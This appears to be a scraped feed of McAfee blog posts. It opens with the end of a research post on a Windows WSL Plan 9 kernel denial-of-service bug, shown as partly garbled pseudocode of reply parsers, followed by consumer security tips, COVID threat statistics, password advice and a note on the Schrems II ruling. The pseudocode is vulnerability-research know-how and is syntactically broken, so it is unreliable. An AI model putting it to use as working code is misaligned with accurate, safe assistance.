NTSTATUS RxMapAndDissociateMidFromContext(PRX_MID_ATLAS P9Client->RDBSS_RxContext, USHORT Mid, &P9Exchange);

}

ProcessVersionReply checks the version sent by Client “P92000.L” which is 8 characters and checks the same length on return so the rversionlen does not affect the tryString function.

void P9Client::ProcessVersionReply (*P9Client, *P9Exchange, & P9message_size) {

char * rversion;
int rversionlen = 0;

rversion = P9Client->P9PacketStart.u.rversion->version->str;

rversionlen = P9Client->P9PacketStart.u.rversion->version->len;

tryString (messagesize, &rversion)

strcmp (Tversion, Rversion);
}

ProcessWalkReply checks that the total number of rwalk structures does not exceed the P9message_size

void P9Client::ProcessWalkReply(rmessage_type, *P9Exchange, &P9message_size){

uint16 nwqid = p9packet.rwalk.nwqid;

uint64 rwalkpacket_size = &P9message_size – 2; // 2 bytes of rwalk header for nwqid field

unit_ptr rwalkpacketstart = &P9Client->P9PacketStart.u.rwalk->wqids;
uint64 error_code = 0x0C0000186;
uint64 rwalk_message_size = nwqid * 13; // 0xd is size of an rwalk struct

if (rwalk_message_size <= P9message_size) {

P9Exchange->Lambda_8972 (int, nwqid, &rwalk_message_size, P9Exchange-> RxContext, & rwalkpacketstart); // Lambda_8972 is Lambda_PTR1 for rwalk message type

} else {

P9Exchange->P9Client::SyncContextErrorCallback (error_code, P9Exchange-> RxContext) // SyncContextErrorCallback is Lambda_PTR2 for rwalk message type

}
}

ProcessReadReply checks the size of the count field does not exceed 0x8000 and writes it into an MDL within P9Exchange-> RxContext to pass back up the RDBSS stack to view file contents within Explorer.

void P9Client::ProcessReadReply (rmessage_type, *P9Exchange, &P9message_size){
unint64 count = P9Client->P9PacketStart.u.rread->count;
P9Exchange->Lambda_2275 (count, P9Exchange-> RxContext, &P9message_size);}

 

Lambda_2275 (count, P9Exchange-> RxContext, &P9message_size) {

uint64 maxsize = P9Exchange-> RxContext+offset; //max_size = 0x8000

unint64 MDL = P9Exchange-> RxContext+offset;

if (count > maxsize) terminate();

memmove (&MDL, P9Client->P9PacketStart.u.rread->data, count);

}

Conclusion

Through this research, we discovered a local Denial of Service (DoS) within the Windows kernel implementation of the P9 protocol. As explained, the vulnerability cannot be exploited to gain code execution within the Windows kernel so there is no risk to users from this specific vulnerability. As a pre-requisite to malicious P9 server attacks, an attacker must hijack the P9 server socket “fsserver”. Therefore, we can mitigate this attack by detecting and preventing hijacking of the socket “fsserver”. McAfee MVISION Endpoint and EDR can detect and prevent coverage against P9 server socket “fsserver” hijacking which you can read more about here.

We hope this research provides insights into the following:

  1. The vulnerability hunting process for new features such as the WSL P9 protocol on the Windows 10 OS
  2. Provide support for future research higher up the WSL communications stack which increases in complexity due to the implementation of a virtual Linux file system on Windows
  3. The value of McAfee Advanced Threat Research (ATR) working closely with our product and innovation teams to provide protection for our customers

Finally, a special thanks to Leandro Costantino and Cedric Cochin for their initial Windows 10 WSL P9 server research.

The post Hunting for Blues – the WSL Plan 9 Protocol BSOD appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/hunting-for-blues-the-wsl-plan-9-protocol-bsod/feed/ 0
Speed or Security? We Say Speed AND Security https://www.mcafee.com/blogs/consumer/security-software-and-device-performance/ https://www.mcafee.com/blogs/consumer/security-software-and-device-performance/#respond Thu, 23 Jul 2020 00:17:12 +0000 /blogs/?p=102855

“Security software slows down my PC.” We often hear this sentiment when users talk about malware protection. While people recognize the value of computer security, most get frustrated if the software bogs down their device. I mean, I myself become frustrated when I’m trying to crunch numbers and I’m suddenly greeted with an hourglass! While […]

The post Speed or Security? We Say Speed AND Security appeared first on McAfee Blogs.

]]>

“Security software slows down my PC.”

We often hear this sentiment when users talk about malware protection. While people recognize the value of computer security, most get frustrated if the software bogs down their device. I mean, I myself become frustrated when I’m trying to crunch numbers and I’m suddenly greeted with an hourglass!

While this may happen with some online safety products, McAfee’s security suites are as light as they get. We understand that while consumers need malware protection, it shouldn’t come at the price of device performance. So, we put our products to the test – AV-TEST and AV-Comparatives to be exact – to show users that they can stay secure without interrupting their digital lives with slow software.*

*AV-Test Results

*AV-Comparatives Results

Testing the Relationship Between Security and Speed

Modern tech users are multitaskers at heart. We need our devices to run all of our favorite programs efficiently, from email to photo editing apps to music streaming services. Security software is another program we need to run – one we’re worried will slow down the rest. So how can we be sure that our PC performance won’t be poorly impacted? Answer: measure it.

To measure how much impact malware protection has on PC performance, some independent test labs include performance impact benchmarks in their security product tests. The most well-known of these test labs are AV-TEST, which is based in Germany, and the Austria-based AV-Comparatives. These independent labs are among the most reputable and well-known anti-malware test labs in the world.

These organizations work by testing and evaluating a number of security products and the impact they have on PC performance. The AV-TEST lab evaluates the latest versions of various security products and measures the average impact of the product on computer speed. On the other hand, AV-Comparatives uses low-end computers and mimics users’ daily usage as much as possible, focusing on activities like copying files, installing and uninstalling applications, launching applications, downloading files, and browsing websites. Based on these tests’ results, products are graded in award levels ranging from ADVANCED+ (the highest ranking) to STANDARD (the lowest ranking).

So, how does McAfee stand up to the competition? Since May 2018, McAfee has consistently received the highest score in all performance tests. As a result McAfee® Total Protection was awarded the ‘2019 Performance Award’ by AV-TEST in March 2020. Additionally, McAfee has achieved the ADVANCED+ ranking continuously since October 2016. In other words, McAfee Total Protection is one of the fastest and lightest products on the market. With results like these, I have to toot our own horn!

How Do These Results Impact Our Day-To-Day Lives?

During the WFH era, users are more reliant on devices than ever before. They need to work quickly and safely, without worrying about online threats. Especially since today’s malware comes in many forms, adapting to new technological advancements and the behaviors of tech-savvy consumers who use them. In fact, hackers often pair their threats to whatever is present in consumers’ lives – so lately we’ve seen malware attacks emerge via COVID-related phishing emails or known device or app vulnerabilities.

What Else Helps with McAfee’s Performance Results?

McAfee Total Protection comes with PC Boost features, which benefit both productivity and entertainment by automatically giving more horsepower to apps you are actively working in and by pausing annoying auto-play videos in your browser. While these additions don’t specifically factor into the aforementioned test results, these automated tools help your computer run faster and more efficiently.

By leveraging a comprehensive solution like McAfee Total Protection, users can ultimately be more efficient with their time online, whether that’s crunching numbers, playing games, or running multiple apps at once. And let’s face it – when our devices make us feel empowered, our digital lives are better.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Speed or Security? We Say Speed AND Security appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/security-software-and-device-performance/feed/ 0
What to Do When Your Social Media Account Gets Hacked https://www.mcafee.com/blogs/consumer/consumer-threat-notices/social-media-account-hacked/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/social-media-account-hacked/#respond Wed, 22 Jul 2020 19:01:15 +0000 https://securingtomorrow.mcafee.com/?p=92869

You log in to your favorite social media site and notice a string of posts or messages definitely not posted by you. Or, you get a message that your account password has been changed, without your knowledge. It hits you that your account may have been hacked. What do you do?  This is a timely question considering that social […]

The post What to Do When Your Social Media Account Gets Hacked appeared first on McAfee Blogs.

]]>

You log in to your favorite social media site and notice a string of posts or messages definitely not posted by you. Or, you get a message that your account password has been changed, without your knowledge. It hits you that your account may have been hacked. What do you do? 

This is a timely question considering that social media breaches have been on the rise. A recent survey revealed that 22% of internet users said that their online accounts have been hacked at least once, while 14% reported they were hacked more than once. 

So, how should you respond if you find yourself in a social media predicament such as this? Your first move—and a crucial one—is to change your password right away and notify your connections that your account may have been compromised. This way, your friends know not to click on any suspicious posts or messages that appear to be coming from you because they might contain malware or phishing attempts. But that’s not all. There may be other hidden threats to having your social media account hacked. 

The risks associated with a hacker poking around your social media have a lot to do with how much personal information you share. Does your account include personal information that could be used to steal your identity, or guess your security questions on other accounts? 

These could include your date of birth, address, hometown, or names of family members and pets. Just remember, even if you keep your profile locked down with strong privacy settings, once the hacker logs in as you, everything you have posted is up for grabs. 

You should also consider whether the password for the compromised account is being used on any of your other accounts, because if so, you should change those as well. A clever hacker could easily try your email address and known password on a variety of sites to see if they can log in as you, including on banking sites. 

Next, you have to address the fact that your account could have been used to spread scams or malware. Hackers often infect accounts so they can profit off clicks using adware, or steal even more valuable information from you and your contacts. 

You may have already seen the scam for “discount  sunglasses that plagued Facebook a couple of years ago, and recently took over Instagram. This piece of malware posts phony ads to the infected user’s account, and then tags their friends in the post. Because the posts appear in a trusted friend’s feed, users are often tricked into clicking on it, which in turn compromises their own account. 

So, in addition to warning your contacts not to click on suspicious messages that may have been sent using your account, you should flag the messages as scams to the social media site, and delete them from your profile page. 

Finally, you’ll want to check to see if there are any new apps or games installed to your account that you didn’t download. If so, delete them since they may be another attempt to compromise your account. 

Now that you know what do to after a social media account is hacked, here’s how to prevent it from happening in the first place. 

How to Keep Your Social Accounts Secure 

  • Don’t click on suspicious messages or links, even if they appear to be posted by someone you know. 
  • Flag any scam posts or messages you encounter on social media to the respective platform, so they can help stop the threat from spreading. 
  • Use unique, complex passwords for all your accounts. Use a password generator to help you create strong passwords and a password manager can help store them.  
  • If the site offers multi-factor authentication, use it, and choose the highest privacy setting available. 
  • Avoid posting any identity information or personal details that might allow a hacker to guess your security questions. 
  • Don’t log in to your social accounts while using public Wi-Fi, since these networks are often unsecured and your information could be stolen. 
  • Always use comprehensive security software that can keep you protected from the latest threats. 
  • Keep up-to-date on the latest scams and malware threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook. 

The post What to Do When Your Social Media Account Gets Hacked appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/social-media-account-hacked/feed/ 0
Staying Home? McAfee Report Shows Malware May Come Knocking https://www.mcafee.com/blogs/consumer/mcafee-report-reveals-covid-malware-insights/ https://www.mcafee.com/blogs/consumer/mcafee-report-reveals-covid-malware-insights/#respond Wed, 22 Jul 2020 04:30:56 +0000 /blogs/?p=102849

It’s no secret that COVID-19 continues to reshape the way we live our everyday lives. With each passing day, we become more reliant on our devices to stay connected with friends and family, move our professional work forward, participate in distance learning, or keep ourselves entertained.   Unfortunately, hackers are all too aware of these habits. In fact, findings from “McAfee’s COVID-19 Threat Report: July 2020” have shown how criminals pair threats to whatever […]

The post Staying Home? McAfee Report Shows Malware May Come Knocking appeared first on McAfee Blogs.

]]>

It’s no secret that COVID-19 continues to reshape the way we live our everyday lives. With each passing day, we become more reliant on our devices to stay connected with friends and family, move our professional work forward, participate in distance learning, or keep ourselves entertained 

Unfortunately, hackers are all too aware of these habits. In fact, findings from McAfee’s COVID-19 Threat Report: July 2020 have shown how criminals pair threats to whatever is present in consumers’ lives – specifically targeting pandemic-related industries, device habits, behaviors, and more with new malware strains 

A Day in the Life of Today’s Consumer

The day in the life of today’s consumer involves a lot of internet time.  

Back in March, users first transitioned from in-office to work from home to promote social distancing. As a result, they conduct their 9-to-5 from their personal living space. But with such a rushed transition, some of these workers aren’t trained on how the change impacts their online security and could be potentially working on unsecured Wi-Fi.  

Working professionals aren’t the only ones who have had to adapt to a new remote environment. Students have also made the transition to distance learning, moving from in-person course work to virtual classroomsBut as more students continue their curriculum from home and online activity increases, they become more reliant on digital platforms, such as video conferencingthat have now caught the eye of hackers.  

When these professionals or students are done for the day, they then turn to some safe ways to unwind. To keep entertained, users have turned to online gaming, shopping, podcasts, social media, and TV streaming for fun – with the latter experiencing a 12% increase in viewing time in the third week of March alone.  

More Online Activity, More Opportunities for Cyberattacks

As it turns out, this increase in online activity has given hackers plenty of new avenues to exploitalmost all of which are pandemic-relatedFirst and foremost, hackers have targeted attacks at those that feel the impacts of COVID-19 most directly, AKA the public sector. As McAfee research discovered, incidents have increased during Q1 2020 within the public sector by 73%, individuals by 59%, education by 33%, and manufacturing by 44%. 

Additionally, McAfee Labs saw an average of 375 new threats per minute and a surge of cybercriminal exploits through COVID-19 themed malicious apps, phishing campaigns, malware, and more during the first quarter of this year. SpecificallyMcAfee researchers discovered campaigns using pandemic-related subject lines  including testing, treatments, cures, and remote work topics. Criminals are using this sneaky tactic to lure targets into clicking on a malicious link, downloading a file, or viewing a PDF, resulting in the user’s device becoming infected with malware.   

The Rise of Malware

Speaking of malware – according to the latest McAfee COVID-19 Threat Report, total malware increased by 27% over the past four quarters and new Mac OS malware samples increased by 51%. New mobile malware also increased by a whopping 71%, with total mobile malware increasing almost 12% over the past four quarters. As for IoT devices, new malware samples increased by nearly 58%, with total IoT malware growing 82% over the past few quarters.  

Mask Your Digital Life

During this time of uncertainty, it can be difficult to decipher what is fact from fiction, to successfully identify a malicious scheme and stop it in its tracks. However, consumers can help protect their digital lives by following security best practices, now and in the future. Here’s what you can do to safeguard your security and remain worry-free 

Stay updated on the latest threats

To track malicious pandemic-related campaigns, McAfee Advanced Programs Group (APG) has published a COVID-19 Threat Dashboard, which includes top threats leveraging the pandemic, most targeted verticals and countries, and most utilized threat types and volume over time. The dashboard is updated daily at 4pm ET 

Beware of messages from unknown users

If you receive a text, email, social media message, or phone call from an unknown user regarding the pandemic, it’s best to proceed with caution and avoid interacting with the message altogether.   

Use a VPN

Avoid hackers infiltrating your network by  using a VPN, which allows you to send and receive data while encrypting – or scrambling – your information so others can’t read it. By helping to protect your network, VPNs also prevent hackers from accessing other devices (work or personal) connected to your Wi-Fi. 

Use a comprehensive security solution

Use a robust security software like McAfee® Total Protection, which helps to defend your entire family from the latest threats and malware while providing safe web browsing.  

Stay updated

To stay updated on all things McAfee  and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast  Hackable?, and ‘Like’ us on Facebook.   

The post Staying Home? McAfee Report Shows Malware May Come Knocking appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/mcafee-report-reveals-covid-malware-insights/feed/ 0
McAfee COVID-19 Report Reveals Pandemic Threat Evolution https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-covid-19-report-reveals-pandemic-threat-evolution/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-covid-19-report-reveals-pandemic-threat-evolution/#respond Wed, 22 Jul 2020 04:01:36 +0000 /blogs/?p=102768

The McAfee Advanced Threat Research team today published the McAfee® Labs COVID-19 Threats Report, July 2020. In this “Special Edition” threat report, we delve deep into the COVID-19 related attacks observed by our McAfee Advanced Threats Research and McAfee Labs teams in the first quarter of 2020 and the early months of the pandemic. What […]

The post McAfee COVID-19 Report Reveals Pandemic Threat Evolution appeared first on McAfee Blogs.

]]>

The McAfee Advanced Threat Research team today published the McAfee® Labs COVID-19 Threats Report, July 2020.

In this “Special Edition” threat report, we delve deep into the COVID-19 related attacks observed by our McAfee Advanced Threats Research and McAfee Labs teams in the first quarter of 2020 and the early months of the pandemic.

What started as a trickle of phishing campaigns and the occasional malicious app quickly turned to thousands of malicious URLs and more-than-capable threat actors leveraging our thirst for more information as an entry mechanism into systems across the world.

Thus far, the dominant themes of the 2020 threat landscape have been cybercriminal’s quick adaptation to exploit the pandemic and the considerable impact cyberattacks have had. For example, many ransomware attacks have escalated into data breaches as cybercriminals up the ante by leaking sensitive, often regulated, data, regardless of whether victims have paid the ransom.

Some of the other significant threat findings in our COVID-19 report include:

  • Average of 375 threats per minute in Q1 2020
  • Nearly 47% of all publicly disclosed security incidents took place in the United States
  • New PowerShell Malware increased drastically
  • Disclosed incidents largely targeted Public, Individual, and Education sectors

In a first, we also have made available a COVID-19 dashboard to complement this threat report and extend its impact beyond the publication date. Timeliness is a challenge for publishing any threat report, but through the development of MVISION Insights our threat reports will include a link to another live dashboard tracking the world’s top threats. We will also make available the IOCs, Yara rules, and mapping to the MITRE ATT&CK framework as part of our continuing commitment to sharing our actionable intelligence. I hope these McAfee resources will be useful to you, the reader.

As we head into the second half of the year, we must consider how the threat landscape has changed when we address and define each attack. Simply assigning a technical descriptor or reverting to the same attack classifications fail to communicate the impact such campaigns have on the broader society.

All too often, we are called into investigations where businesses have been halted, or victims have lost considerable sums of money. While we all have had to contend with pandemic lockdown, criminals of all manner of capability have had a field day.

We hope you enjoy these new threat report approaches, and moreover we would appreciate you sharing these findings far and wide. These tools and insights could be the difference between a business remaining operational or having to shut its doors at a time when we have enough challenges to contend with.

 

The post McAfee COVID-19 Report Reveals Pandemic Threat Evolution appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-covid-19-report-reveals-pandemic-threat-evolution/feed/ 0
Strong Password Ideas to Keep Your Information Safe https://www.mcafee.com/blogs/consumer/strong-password-ideas-to-keep-your-information-safe/ https://www.mcafee.com/blogs/consumer/strong-password-ideas-to-keep-your-information-safe/#respond Mon, 20 Jul 2020 15:31:27 +0000 /blogs/?p=102825 Strong Passwords

Strong Password Ideas to Keep Your Information Safe Password protection is one of the most common security protocols available. By creating a unique password, you are both proving your identity and keeping your personal information safer. However, when every account you have requires a separate password, it can be an overwhelming task. While you should […]

The post Strong Password Ideas to Keep Your Information Safe appeared first on McAfee Blogs.

]]>
Strong Passwords

Strong Password Ideas to Keep Your Information Safe

Password protection is one of the most common security protocols available. By creating a unique password, you are both proving your identity and keeping your personal information safer. However, when every account you have requires a separate password, it can be an overwhelming task. While you should be concerned about the safety of your data, you also want to avoid the frustration of forgetting your password and being blocked from the information you need. However, the benefits of using strong, unique passwords outweigh the occasional inconvenience.

Benefits of Strong Passwords

The main benefit of a strong password is security. Hackers work quickly when they are trying to access accounts. They want to steal as much information as they can in as short a time as possible. This makes an account with a strong password less inviting because cracking the code is much more involved.

A strong password also limits the damage that hackers can do to your personal accounts. A common strategy involves cracking the passwords of less secure sites with limited personal information. The hackers hope that they can use the password from your gym membership app to access information in your online banking account. Strong password protection prevents this situation.

Common Poor Password Practices

When someone is registering an online account, it can be tempting to blaze through the password process. In order to move quickly, there are several poor password practices that people employ.

  • Simple passwords: Password-cracking programs start by entering obvious combinations. These are passwords where the user puts no thought into the code such as “password” or “1234567”.
  • Repeated passwords: You may think you have such an unbreakable password that you want to use it for all of your accounts. However, this means that if hackers compromise one of your accounts, all of your other accounts are vulnerable.
  • Personal information: The number combinations that you are apt to remember easily are the ones that hackers can find. You may have put your birthday or graduation year on public display in a social media account. Your dog’s name may be unusual, but if you share information about your canine friend with the world, its name is a weak password.

The Meaning of a Strong Password

A password is considered strong when it is difficult for a hacker to crack it quickly. Sophisticated algorithms can run through many password combinations in a short time. A password that is long, complex and unique will discourage attempts to break into your accounts.

  • Long: The combinations that protect your accounts should be long enough that it would be difficult for a computer program to run through all the possible configurations. The four-digit pin on a bank card has 10,000 possible combinations. This might take some time for a human being to crack, but a computer program with unlimited tries could break it in a few seconds. If you were only using numbers, every character in your password would raise the possible combinations by a power of 10. To stump the algorithms, you want a password that is a minimum of 12 characters long.
  • Complex: To increase the challenge of your password, it should have a combination of uppercase letters, lowercase letters, symbols and numbers. Hacking algorithms look for word and number patterns. By mixing the types of characters, you will break the pattern and keep your information safe.
  • Unique: If you have been reusing your passwords, it is time for you to start the work of changing them. Every one of your accounts should have its own password. At the very least, make certain that you have not reused passwords for your financial institutions, social media accounts and any work-related accounts.

Creating a Layered Password

If you want a password that is memorable but strong, you can easily turn a phrase into a layered, complex password. In this process, it is important to note that you should not use personal information that is available online as part of your phrase.

  • Pick a phrase that is memorable for you: It should not be a phrase you commonly use on social media accounts. If you are an avid runner you might choose a phrase like, “Running 26.2 Rocks!”
  • Replace letters with numbers and symbols: Remove the spaces. Then, you can put symbols and numbers in the place of some of the letters. Runn1ng26.2R0ck$!
  • Include a mix of letter cases: Finally, you want both lower and uppercase letters that are not in a clear pattern. Algorithms know how to look for common patterns like camelCase or PascalCase. Runn1NG26.2R0cK$!

Now, you have a password that you can remember while challenging the algorithms hackers use.

Employing a Password Manager

When you consider the number of accounts you need to protect, coming up with a properly layered password is a time-consuming task. Even if you are able to decide on a memorable phrase, there are just too many accounts that need passwords. A password manager is a helpful tool to keep you safe while you are online. It acts as a database for all of your passwords. Each time you create a new code, it stores it so that you can automatically enter it later. You only need to remember a single password to access the tools of your manager.

Most managers can also do the work of creating complex, layered passwords for your accounts. These will be a string of random numbers, letters and characters. They will not be memorable, but you are relying on the manager to do the memorizing. These machine-generated passwords are especially helpful for accounts you rarely access or that do not hold significant information.

Maintaining an Offline Password List

For critical accounts like your bank account or a work-related account, it can be helpful to keep an offline list of your passwords. Complex passwords are meant to be difficult to remember. You may recall the phrase but not all the detailed changes that make it layered. Keeping a document on a zip drive or even in a physical paper file or journal will allow you to access your information if your hardware fails or you are switching to a new system.

Keeping the Whole System Safe

Cracking passwords is just one of the strategies hackers use to steal information. In addition to using strong passwords, it is important to employ comprehensive security software. Strong passwords will help protect your online accounts. Strong overall security will keep your hardware and network safe from danger.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Strong Password Ideas to Keep Your Information Safe appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/strong-password-ideas-to-keep-your-information-safe/feed/ 0
 Ways to Strengthen Your Family’s Digital and Mental Wellbeing https://www.mcafee.com/blogs/consumer/family-safety/ways-to-strengthen-your-familys-digital-and-mental-wellbeing/ https://www.mcafee.com/blogs/consumer/family-safety/ways-to-strengthen-your-familys-digital-and-mental-wellbeing/#respond Mon, 20 Jul 2020 05:56:30 +0000 /blogs/?p=102807 mental wellbeing

There’s a lot that feels out of control right now. City and school re-openings are in limbo, and life for many still feels upended. But one thing we can control is our efforts to safeguard our family’s digital and mental health. Both adults and kids use television, tablets, and smartphones more these days for both […]

The post  Ways to Strengthen Your Family’s Digital and Mental Wellbeing appeared first on McAfee Blogs.

]]>
mental wellbeing

There’s a lot that feels out of control right now. City and school re-openings are in limbo, and life for many still feels upended. But one thing we can control is our efforts to safeguard our family’s digital and mental health.

Both adults and kids use television, tablets, and smartphones more these days for both school and entertainment. According to a study by Axios, children’s screen time during the pandemic is surging by as much 50 to 60 percent putting screen time for children 12 and younger at nearly five hours or more per day. Another study in the Journal of Medical Internet Research indicates people’s mental health has worsened during the Coronavirus.

Priority: Family Wellbeing

It’s clear this season has impacted all ages in myriad ways and put the spotlight on the importance of digital and mental health. Here are some resources and tips to help strengthen both.

Keep structure in-tact. Experts agree that establishing a daily structure is the best way to keep family life as healthy as possible right now. Scheduling set times for learning, chores, exercise, mealtimes, screen time, and connecting with peers in online hangouts, is essential. Safe Online: Establishing structure may be easier with software that also helps limit screen time, monitor activity, and filter apps and websites.DigitalWellbeing

Clarify the news. Kids pick up on everything, both true and untrue. They often collect bits and pieces of “news” from TV, overhearing adults, or fragments of stories from peers, all of which can increase anxiety. Safe Online: Parents can help ease the fear caused by misinformation by (age-appropriately) updating children with facts on current events and helping them understand the context of what they see online or on television. 

Encourage connection. Social distancing does not mean social isolation. If your child seems lonely or isolated, help pull them back into the mix. If they can’t meet in a safe, socially-distanced setting with friends face-to-face, allow extra time on Messenger Rooms or Zoom to group chat with peers or relatives. Safe Online: Keep kids safe by using privacy settings in video apps and always supervise young children. 

Keep device use in check. Yes, we’re all on devices more, but that doesn’t greenlight a device-free for all. Balance (pandemic or not) is always the aim of managing digital and mental health. Consider putting away devices during mealtime, before bedtime, and even challenge each other to go phone and screen-free one full day a week. Safe Online: Check your phone usage stats on your devices daily or use software to track it for you. 

Get moving. Squeezing in even 15-30 minutes of exercise a day alters our biochemical and hormonal balance and reduces mood swings, fatigue, anxiety, and feelings of hopelessness. Safe Online: If you use mobile fitness apps, maximize your privacy settings, read app terms to understand how the app tracks your health data.

Parent self-care. “You can’t pour from an empty cup,” is a simple but powerful sentiment these days. Unplugging, turning off the news, and resting or meditating can turn a stressful day around. Safe Online: Minimize scrolling mindlessly online or engaging in online conflict. Modeling balanced digital habits is self-care and is a powerful way to help your child do the same. 

Family Resources Online

Consider online resources. To meet the demand of families at home, most insurance plans now offer online counseling. Also, surprisingly, Instagram is becoming a mental health hub. As worry continues around finances, job loss, health, and the impact of isolation, meeting with a counselor or therapist 1-1 online may be an easy, useful solution. To get started, do a hashtag search for #FamilyCounseling #Marriage #Counselling #Therapy #Stress #Anxiety or a profile search with the same keywords. Safe Online: Vet online counselors and therapists to make sure they are licensed and not part of an online scam.

MHA resources. Mental Health America has compiled an impressive range of resources and information for people in need of services such as domestic and child abuse, drug and alcohol issues, financial issues, suicide, depression, and LGBTQ issues. The site houses endless blogs and on-demand webinars specific to Coronavirus and family mental health issues.

As this season of uncertainty continues, it’s important to remember you are not alone. Everyone is feeling all the feelings, and no one has things like structure and balance mastered. But, we’re all getting wiser each day simply by committing to protecting the things that matter most.

The post  Ways to Strengthen Your Family’s Digital and Mental Wellbeing appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/family-safety/ways-to-strengthen-your-familys-digital-and-mental-wellbeing/feed/ 0
The Schrems II Decision: The Day After https://www.mcafee.com/blogs/enterprise/data-security/the-schrems-ii-decision-the-day-after/ https://www.mcafee.com/blogs/enterprise/data-security/the-schrems-ii-decision-the-day-after/#respond Fri, 17 Jul 2020 22:30:35 +0000 /blogs/?p=102795

This blog is for information purposes only and it does not constitute legal advice or advice on how to achieve operational privacy and security or compliance with laws or regulations. The European Court of Justice (“CJEU”) yesterday invalidated the Privacy Shield, an agreement between the European data regulators and the U.S. Chamber of Commerce created […]

The post The Schrems II Decision: The Day After appeared first on McAfee Blogs.

]]>

This blog is for information purposes only and it does not constitute legal advice or advice on how to achieve operational privacy and security or compliance with laws or regulations.

The European Court of Justice (“CJEU”) yesterday invalidated the Privacy Shield, an agreement between the European data regulators and the U.S. Chamber of Commerce created in 2016 that allows businesses in the European Union to transfer data to the U.S.  The Court said Privacy Shield, which is used by more than 5,000 companies (though not McAfee), does not comply with European privacy rights.

The decision is seen as one of the most important international privacy cases in recent history and arose from a complaint against Facebook brought to the Irish Data Protection Commissioner by Max Schrems.

Schrems has been challenging the transfer of his data (and the data of EU citizens generally) to the United States by Facebook, which has its European base in Ireland. His first case (“Schrems I”) led the Court in 2015 to invalidate the Safe Harbor arrangement, a prior arrangement governing that data transfers from the EU to the US. The Safe Harbor scheme was replaced by the EU-US Privacy Shield on July 12, 2016, in response to the case.

The Court gave two major reasons for its decision (“Schrems II”) that the European Commission was wrong to say the Privacy Shield adequately protected the data of EU residents.  The Court said that

  • S. surveillance programs are not limited to what is strictly necessary and proportional and hence do not meet the requirements of Article 52 of the EU Charter on Fundamental Rights;
  • EU data subjects lack actionable judicial redress with regards to U.S. surveillance, and, therefore, do not have a right to an effective remedy in the U.S., as required by Article 47 of the EU Charter.

Additionally, the CJEU ruled that:

  • Standard Contractual Clauses (“SCCs”), which are currently being reviewed by the European Commission, and Binding Corporate Rules (“BCRs”) remain valid mechanisms for transferring data outside of the European Union;
  • BUT companies must verify, on a case-by-case basis, whether the law in the recipient country ensures adequate protection, under EU law, for personal data transferred under SCCs and, where it doesn’t companies must provide additional safeguards or suspend transfers. The ruling placed the same requirement on EU data protection authorities to suspend such transfers on a case-by-case basis where equivalent protection cannot be ensured.

We’ve been starting hearing some myths that need debunking:

  • Myth 1: Keeping data in Europe is the ONE solution. Well no, it isn’t. The internet is Global, the Cloud is global and data localization may not prevent the application of the U.S.’s Cloud Act;
  • Myth 2: The U.S. will need to change its laws: Not so fast! This may help,  but will take some time, and to meet what the Court wants will require changes both to the Patriot Act and a new recourse means – no small ask of a U.S. Congress when the House and the Senate are working well together, much less in the middle of a pandemic with a lot of political divisiveness;
  • Myth 3: This only concerns the U.S. Nope, government surveillance (and secretive surveillance) exists almost everywhere – and is necessary, including in the European Union and in some of the jurisdictions that the EU has said have adequate protections.  This ruling could open the door for many uncomfortable conversations with jurisdictions that have thought they were safe in the past.
  • Myth 4: The ruling says that European companies must stop using U.S. service providers, especially Cloud service providers. No, that’s again bashing multinational corporations which abide by the strictest security standards.

From a practical standpoint, what are the changes?

  • Companies that used to transfer data under the Privacy Shield should consider signing SCCs and may want to think about a project to put in place BCRs;
  • SCCs may need to be amended to add additional language so to provide additional safeguards when faced with access requests by public authorities around the world.

What does this mean for McAfee customers? McAfee is committed to adhering to the applicable laws.  We are glad to sign SCCs with customers.  We have done a lot of work to make sure that our products were ready for the GDPR, and continue to track the regulatory and judicial changes.  We’re glad to talk to you about this and other issues, contact us here.

 

The post The Schrems II Decision: The Day After appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/enterprise/data-security/the-schrems-ii-decision-the-day-after/feed/ 0
Create Strong Passwords with a Password Generator https://www.mcafee.com/blogs/consumer/create-strong-passwords-with-a-password-generator/ Fri, 17 Jul 2020 19:59:35 +0000 /blogs/?p=102777 Create Strong Passwords with a Password Generator Whether you use the internet for several hours every day or only browse it on occasion, you have likely created numerous accounts on streaming services, financial services, and online storefronts like Amazon. Many of these accounts contain highly sensitive information. Hackers can get into online accounts and computers […]

The post Create Strong Passwords with a Password Generator appeared first on McAfee Blogs.

]]>
Create Strong Passwords with a Password Generator

Whether you use the internet for several hours every day or only browse it on occasion, you have likely created numerous accounts on streaming services, financial services, and online storefronts like Amazon. Many of these accounts contain highly sensitive information. Hackers can get into online accounts and computers by guessing passwords, which means that your personal information would be available to them if you use a weak password.

To effectively protect your accounts from being hacked, it’s important that you have a strong password with each account that you create. However, it can be difficult to think of the perfect password that will keep your account safe from any hacker. To that end, there are many ways to create strong passwords, the primary of which is through a password generator. This article goes into detail about the importance of using good passwords and how to create them.

Importance of Having a Strong Password

Whenever you purchase an item online, you will be required to enter some financial information, which can include your bank account or credit card number. Many individuals may make the mistake of saving their financial information to the account because of how convenient it is. When you need to purchase an item in the future, you won’t need to go through the hassle of reentering your credit card information. The problem with saving your financial info to your account is that hackers who get into your account will have automatic access to the information at hand.

Website Security Measures Also Benefit from Strong Passwords

